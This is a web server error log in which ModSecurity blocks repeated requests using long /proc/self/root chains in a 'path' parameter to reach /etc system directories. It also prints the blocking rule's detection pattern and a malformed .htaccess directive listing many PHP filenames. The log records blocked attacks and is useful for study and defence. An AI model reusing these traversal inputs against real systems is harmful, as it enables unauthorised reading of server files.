[Thu Mar 19 09:37:21.297479 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:55776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvuAQbLMZ6AikZjR9VUtQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 09:37:21.545788 2026] [mime_magic:error] [pid 27403:tid 140411733534464] (70014)End of file found: [client 57.141.18.47:55862] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:37:34.125888 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:37:54.186033 2026] [core:alert] [pid 27403:tid 140411557287680] [client 57.141.18.92:57062] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:37:54.186033 2026] [core:alert] [pid 17653:tid 140411624429312] [client 74.7.241.31:48462] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/local/locaweb/lib
[Thu Mar 19 09:37:54.301949 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.228.61:46692] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvuIta6ubjKNq_cu4ZF-wAAA04"]
[Thu Mar 19 09:37:55.684724 2026] [mime_magic:error] [pid 15826:tid 140411557287680] (70014)End of file found: [client 57.141.18.62:56842] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:37:57.133770 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55468] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:38:02.792026 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:60588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvuKta6ubjKNq_cu4ZGAgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:38:20.133779 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:38:45.125784 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:39:09.125862 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:39:13.952830 2026] [core:alert] [pid 17653:tid 140411674785536] [client 74.7.243.128:34342] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/usr/libexec
[Thu Mar 19 09:39:32.365807 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:39:56.033829 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:40:20.563061 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.244.43:42686] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvutNa6ubjKNq_cu4ZGjQAAA1I"]
[Thu Mar 19 09:40:23.069945 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58590] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:40:52.125890 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59150] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:41:02.343349 2026] [core:alert] [pid 26799:tid 140411607643904] [client 57.141.18.48:33146] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:41:12.622371 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:58930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvu6Na6ubjKNq_cu4ZG1wAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:41:21.129793 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59808] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:41:32.831920 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:35632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvu_OyqAr6etmhZHNpYewAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:41:49.125781 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60380] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:42:16.501817 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:42:29.428284 2026] [:error] [pid 17653:tid 140411590858496] [client 74.7.243.128:33914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvvNcdf6f5d65gmYZRtXQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:42:40.125792 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33438] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:43:02.189781 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:43:13.759088 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.228.61:51712] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvvYcdf6f5d65gmYZRtcwAAAsE"]
[Thu Mar 19 09:43:25.130038 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:43:51.137806 2026] [proxy_fcgi:error] [pid 27293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:43:53.121542 2026] [mime_magic:error] [pid 30077:tid 140411741927168] (70014)End of file found: [client 57.141.18.54:36966] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:44:07.489778 2026] [mime_magic:error] [pid 30077:tid 140411699963648] (70014)End of file found: [client 57.141.18.47:37440] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:44:16.133841 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35760] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:44:31.823732 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.97:38032] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:44:38.125847 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36238] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:44:46.436727 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:48830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvvvuyqAr6etmhZHNpY5wAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:45:01.133803 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:45:06.203608 2026] [core:alert] [pid 19093:tid 140411741927168] [client 57.141.18.115:38684] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 09:45:10.489349 2026] [mime_magic:error] [pid 30077:tid 140411548894976] (70014)End of file found: [client 57.141.18.94:38510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:45:25.067362 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.244.43:59870] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvv5eyqAr6etmhZHNpZBQAAAFY"]
[Thu Mar 19 09:45:28.125807 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:45:44.820487 2026] [core:alert] [pid 26799:tid 140411582465792] [client 57.141.18.74:39650] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:45:47.409097 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.243.128:56322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvv-wbLMZ6AikZjR9VVxgAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:45:53.569967 2026] [mime_magic:error] [pid 31803:tid 140411616036608] (70014)End of file found: [client 57.141.18.63:39732] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:45:54.136511 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:45:54.475075 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:41074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvwAta6ubjKNq_cu4ZHfwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:46:16.133652 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:46:33.409355 2026] [core:alert] [pid 26799:tid 140411691570944] [client 57.141.18.37:40708] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:46:41.149807 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38930] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:46:43.311522 2026] [:error] [pid 19093:tid 140411674785536] [client 74.7.243.128:41086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvwM1_V7PWP6ixUYl60iQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:47:08.129823 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39502] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:47:21.675325 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:38488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvwWf-YZRR_7pZ7nDKD7wAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:47:34.135340 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:48:03.116322 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:48:22.582415 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.228.61:50034] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvwlsdf6f5d65gmYZRuFAAAAss"]
[Thu Mar 19 09:48:32.133772 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:48:57.129847 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42168] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:49:21.161782 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:49:44.057862 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43140] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:50:08.037861 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:50:19.747438 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:40286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvxC-yqAr6etmhZHNpZlAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:50:29.391915 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.244.43:35290] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvxFeyqAr6etmhZHNpZmAAAAFg"]
[Thu Mar 19 09:50:32.045571 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:50:35.894220 2026] [mime_magic:error] [pid 26799:tid 140411574073088] (70014)End of file found: [client 57.141.18.8:45264] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
